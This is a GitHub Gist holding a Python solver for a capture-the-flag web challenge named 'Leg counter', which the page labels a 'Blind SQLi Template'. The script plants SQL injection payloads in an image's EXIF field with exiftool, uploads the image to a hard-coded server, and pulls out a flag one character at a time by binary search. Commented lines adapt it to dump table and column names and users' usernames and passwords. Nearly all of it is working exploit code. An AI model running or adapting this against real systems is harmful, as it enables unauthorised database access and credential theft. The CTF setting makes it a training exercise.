Last active
October 3, 2019 10:25
-
-
Save abdilahrf/f9b071bc065bc9febbbcbfad36708548 to your computer and use it in GitHub Desktop.
Leg counter web challenges solver (Blind SQLi Template)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import re | |
from StringIO import StringIO | |
from pycurl import * | |
import os | |
import pickle | |
url = "http://103.56.207.107:50001/upload.php" | |
payload = { | |
"Submit":"Deteksi", | |
"token":"", | |
} | |
http_proxy = "http://127.0.0.1:8080" | |
https_proxy = "https://10.10.1.11:1080" | |
ftp_proxy = "ftp://10.10.1.10:3128" | |
proxyDict = { | |
"http" : http_proxy, | |
"https" : https_proxy, | |
"ftp" : ftp_proxy | |
} | |
headers = { | |
"Cache-Control": "max-age=0", | |
"Origin": "http://103.56.207.107:50001", | |
"Upgrade-Insecure-Requests": "1", | |
"Content-Type": "multipart/form-data", | |
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36", | |
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", | |
"Referer": "http://103.56.207.107:50001/", | |
"Accept-Language": "en-US,en;q=0.9,de;q=0.8,es;q=0.7,id;q=0.6,ms;q=0.5", | |
"Connection": "close", | |
"Cookie": "PHPSESSID=5d42tgrbtj0lifr04f02k3r1e6" | |
} | |
cookies = {"PHPSESSID": "5d42tgrbtj0lifr04f02k3r1e6"} | |
def check(data): | |
return re.search("Satu kaki", data) | |
def getToken(): | |
req = requests.session() | |
greptoken = req.get("http://103.56.207.107:50001/", headers=headers, proxies=proxyDict) | |
token = str(re.search(r"type=\"hidden\" value=\"(.*)\"", greptoken.text).group(1).split("\"")[0]).strip() | |
return token | |
def upload(token): | |
c = Curl() | |
d = StringIO() | |
h = StringIO() | |
c.setopt(URL, url) | |
c.setopt(POST, 1) | |
c.setopt(HTTPPOST, [('legpic', (FORM_FILE, '1leg.jpg')), ('submit', 'Deteksi'), ('token', str(token))]) | |
c.setopt(COOKIEFILE, 'cookie.txt') | |
c.setopt(COOKIEJAR, 'cookie.txt') | |
c.setopt(FOLLOWLOCATION, 1) | |
c.setopt(PROXY, '127.0.0.1:8080') | |
c.setopt(WRITEFUNCTION, d.write) | |
c.setopt(HEADERFUNCTION, h.write) | |
c.perform() | |
c.close() | |
return d.getvalue() | |
def blind(kolom,table): | |
passwd = "" | |
idx = 1 | |
while (True): | |
lo = 1 | |
hi = 255 | |
temp = -1 | |
while(lo <= hi): | |
mid = (lo + hi) / 2 | |
# command = "exiftool -ImageDescription=\"leg=(SELECT CASE when hex(substr({},{},1)) <= hex(char({})) THEN 1 ELSE 2 END FROM {})\" 1leg.jpg".format(str(kolom),str(idx),str(mid),str(table)) | |
command = "exiftool -ImageDescription=\"leg=(SELECT CASE when hex(substr({},{},1)) <= hex(char({})) THEN 1 ELSE 2 END FROM {})\" 1leg.jpg".format(str(kolom),str(idx),str(mid),str(table)) | |
os.system(command) | |
res = upload(getToken()) | |
#print command | |
#print res | |
if check(res): | |
hi = mid-1 | |
temp = mid | |
else: | |
lo = mid+1 | |
if (hi == 0): break | |
passwd += chr(temp) | |
print "Result [{}]: {}".format(table,passwd) | |
idx += 1 | |
return passwd | |
blind("flaag","mysecretflaag") | |
# blind("name","sqlite_master") | |
# blind("sql","sqlite_master where sql like(char(37,102,108,97,103,37))") | |
# PRAGMA table_info(sqlite_master); | |
#CREATE TABLE Legs (Id INTEGER PRIMARY KEY, Session TEXT UNIQUE, Leg INTEGER) | |
# get table name | |
# blind("group_concat(table_name)", "information_schema.tables where table_schema!=0x696e666f726d6174696f6e5f736368656d61") | |
# blind("group_concat(table_name)", "information_schema.tables order by table_schema desc") | |
# Result: users | |
# | |
# get column name | |
# username,password | |
# blind("group_concat(column_name)", "information_schema.columns where table_name='users'") | |
# blind("group_concat(column_name)", "information_schema.columns where table_name='Login'") | |
# blind("group_concat(column_name)", "information_schema.columns where table_name='Flag'") | |
# get data | |
# blind("group_concat(username,0x3a,password)", "users") | |
# blind("group_concat(username,password)", "Login") | |
# blind("group_concat(username,password)", "Flag") | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment